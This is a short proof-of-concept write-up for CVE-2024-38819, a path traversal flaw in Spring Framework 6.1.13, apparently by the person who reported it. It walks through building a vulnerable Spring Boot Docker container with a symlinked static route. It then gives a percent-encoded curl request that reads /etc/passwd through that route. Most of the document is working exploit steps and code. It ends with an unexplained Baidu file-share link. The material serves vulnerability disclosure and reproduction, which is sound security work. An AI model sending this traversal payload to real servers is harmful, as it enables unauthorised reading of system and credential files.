This is a proof of concept for the vulnerability, which I reported, demonstrating a path traversal exploit.
Execution Steps
Build the Docker image (Spring Boot 3.3.4, based on Spring Framework 6.1.13)
cd vuln
docker build -t cve-2024-38819-poc .Run the container and expose port 8080 to the host machine
docker run -d -p 8080:8080 --name cve-2024-38819-poc cve-2024-38819-poc
Run the following command to execute the PoC and confirm the vulnerability
curl http://localhost:8080/static/link/%2e%2e/etc/passwd
If the attack is successful, the contents of the
/etc/passwd
file will be displayed.
Explanation
Create
PathTraversalDemoApplication.java
with the following code to set up static file routing usingRouterFunction
andFileSystemResource
:public RouterFunction<ServerResponse> staticResourceRouter() {
return RouterFunctions.resources("/static/**", new FileSystemResource("/app/static/"));
}Add the following command to the Dockerfile to create a symbolic link:
RUN ln -s /static /app/static/link
Create a payload that leverages percent-encoding to traverse directories through the symbolic link.
Path:
Use the following
curl
command to execute the PoC and verify if the attack is successful:curl http://localhost:8080/static/link/%2e%2e/etc/passwd
If the attack is successful, the contents of the
/etc/passwd
file will be displayed.
Disclaimer
link:https://pan.baidu.com/s/1Z0t9TpTPSjpXPEJ6sRIznA?pwd=weew
请登录后查看评论内容